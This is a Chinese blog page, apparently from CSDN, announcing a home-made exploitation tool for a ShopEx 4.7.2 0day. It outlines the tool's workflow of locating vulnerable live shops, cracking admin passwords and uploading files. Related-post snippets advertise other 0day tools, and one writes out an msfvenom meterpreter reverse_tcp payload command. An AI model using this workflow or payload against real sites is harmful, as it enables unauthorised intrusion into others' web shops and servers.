『原创』ShopEx 4.7.2 0DAY 利用工具

最新推荐文章于 2025-01-04 12:29:28 发布
原创 最新推荐文章于 2025-01-04 12:29:28 发布 · 641 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#工具

本文详细介绍了ShopEx系统中一个复杂漏洞的利用过程,包括如何寻找存在漏洞的站点、爆破密码以及上传文件等关键步骤。

 这个是最难写的了。。。问了不少人,也问了发表漏洞的作者,终于写出来了:)

这个漏洞很难利用。。。上传链接、名称、shopex字符的md5 一起还得进行md5...

然后上传链接和名称单独进行BASE64...

最后把MD5弄成了小写的才传了上去...累死...不是软件太麻烦,而是漏洞太麻烦。。。太乱,自己研究了半天才弄好,要整个的都利用下来很困难

按顺序排列的话,

难点一是在找有漏洞的网站这部分,有的站有漏洞,程序包不出来是因为没有写猜解表这部分

难点二是在爆密码的时候密码有可能不够32位的md5,因此需要手动进行爆密吗,程序为了简洁就没写这部分了

难点三就是上传这部分了。。。有的进了后台也传不了,发表漏洞的作者和我说要是进了后台上传成功率是99%,不知是不是这么邪乎。。。莫非我RP出问题了?- -

[电子商务]ShopEx 网上商店系统 v4.7.2 RC2_shopex_singlev472rc2.zip
03-13
ShopEx v4.7.2 RC2是该软件的一个特定版本,其中“RC2”代表“Release Candidate 2”,意味着这是在正式版本发布前的第二个候选版本,通常包含了比早期测试版更多的修复和改进。 该版本可能包含以下关键知识点: 1...
[电子商务]ShopEx 网上商店系统 v4.7.2 RC2_shopex_singlev472rc2.rar
最新发布
01-24
ShopEx网上商店系统v4.7.2 RC2是该系统的一个版本号,其中“RC2”指的是Release Candidate 2,即候选发布版2,这意味着它是一个尚未正式发布的测试版本。该版本为用户提供了电子商务相关的各项功能,包括商品管理、...
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
0day软件整理【使用工具
眼界决定世界 奋斗成就梦想
02-02 1424
 2007-2-1PaceStar.LanFlow.Net.Diagrammer.v5.08-Lz0易用的强大功能的网络拓扑图绘制工具,使用LanFlow你能用几百种预先设计好的图标、图形等文件来构架,设计出你的计算机网络通信结构,并在图表中支持EMF,WMF,BMP,JPG等格式文件.http://www.pacestar.com/lanflow/index.html图片 : htt
原创』SupeV 1.0.1 0DAY 利用工具
spacehacker的小屋
03-09 446
SupeV 1.0.1 0DAY 利用工具唉。。。对于这个工具我说啥好呢。。。第一版版权被君董盗了,后来谈半天才OK...- -!他竟然还要那去卖钱。。。汗。。。 这个共有两种方法来获得需要的文件,和出源码的意思差不多第一种方法是自己研究出来的,找到了获取网站的根目录和文件相对路径的方法- -,那个是第一版第二版加上了捷径,前提是网站存在漏洞的情况下- - 可以一步
0day工具
tainqiuer123的博客
04-14 428
1、ollydbg集成反汇编分析、十六进制编辑、动态调试等多种功能,缺点:无法调试内核(与SoftCE和WinDbg相比) ollydbg快捷键 快捷键 功能 说明 F8 单步执行 遇到函数调用指令不跟入(step over) F7 单步执行 遇到函数调用指令跟入(step in) F2 设置断点 在一条指令上按F2键将设置断点,再按一次将取消断点 F4 执行到当前光标所选中的指令 在遇到循环时可以方便地使用F4键执行到循环结束
方程式0day图形化利用工具
weixin_30786657的博客
04-18 2149
最近方程式的漏洞着实活了一把,分析了下githup上面的文件目录,找到了利用文件,主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议,其他的没写,基本上一样的吧,程序主界面如下图: 简单说下实现过程,仔细翻过的朋友肯定看到其中的.exe文...
shopex 4.8.5 webshell 0day
05-23
shopex 4.8.5 webshell 0day
ShopEx V4.7.2 RC1:后台重构,提升效率
ShopEx V4.7.2 RC1 是一个专门用于构建网店商城的软件,支持简体中文、繁体中文和英文三种语言,旨在为用户提供一个高效且便捷的电子商务环境。该版本的更新重点在于后台系统的优化和性能提升。通过对后台进行重构,...
ECSHOP 13年前版本0DAY EXP工具详解
因此,讨论0day EXP工具时,我们应该强调其用于合法和正当的测试和防御目的。 ### 结论 在了解了ECSHOP的背景、ODAY漏洞的影响、以及针对老版本ECSHOP的风险之后,我们可以得出结论,网站的所有者和管理员需要对...
shopex增强工具 shopex上传软件
04-23
SHOPEX增强工具把淘宝数据包批量上传到自己的ShopEX独立网店。完整保留商品的颜色、尺码、库存、货号、重量、首页图、详情图、商品描述、扩展属性等信息。对于网店中缺少的规格,软件会自动添加,无需手工建立。
强大的0day神器
05-01
包含很多oday的利用exp。直接秒杀漏洞网站。
0day漏洞大集合
06-09
0day漏洞 最新0day 突破安全狗 web渗透利用工具 仅供学习研究
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
方程式Windows SMB利用
05-04
方程式利用
MySQL 0day漏洞与利用工具防范指南
weixin_28949937的博客
10-20 1205
本文还有配套的精品资源,点击获取 简介:MySQL作为流行的关系型数据库管理系统,其安全漏洞可能被黑客用于未授权访问、数据泄露等攻击。0day漏洞未公开修复前可被恶意利用,而"exp"指利用这些漏洞的攻击代码。文章讨论了0day漏洞的产生、黑市交易、以及可能的恶意程序如"mysql_hash.exe"和"usage.jpg"。强调了数据库管理员应保持系统更新,实施严格权限控...
Windows 0day成功验证之ETERNALBLUE
weixin_30888027的博客
04-16 181
本帖由春秋首发~作者:神风@春秋文阁负责人方程式又一波0day【该贴有工具】:https://bbs.ichunqiu.com/thread-21736-1-1.html最近一段时间出现一波高潮小伙伴都在跃跃欲试现在就做一次详细的过程吧~~~有说的不好的地方望指出!!~~~本次利用是在本地测试 只能有个大概的思路~~~正文、首先利用就必须有一个运行环境已测试用win732位环...
方程式又一波大规模 0day 攻击泄漏,微软这次要血崩【附工具】 heatlevel
xcntime的专栏
06-02 1469
春秋文阁负责人版主 发表于 2017-4-15 11:01:541133156497 微软又爆新洞,一大早就在知乎看到文章,转发过来给坛友们看看 原帖地址:https://zhuanlan.zhihu.com/p/26375989?utm_medium=social&utm_source=wechat_timeline&from=tim
【网络安全】零日漏洞(0day)是什么?如何防范零日攻击?
chengxuyuanyy的博客
01-04 1166
漏洞是源于编程错误或不当配置而产生的软件或硬件缺陷。由于漏洞是无意的,因此它们很难被发现,并且可能几天、几个月甚至几年都不会被注意到。大部分的漏洞都是第三方的安全研究人员发现。零日漏洞也可以称为零时差漏洞,通常是指还没有补丁的安全漏洞。零日漏洞中的“零日”得名于漏洞被公开后,补丁未出现的天数。漏洞被公开当天,一般来讲都不会及时推出补丁,所以称为零日漏洞;如果N日后仍然没有补丁,则称为N日漏洞。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值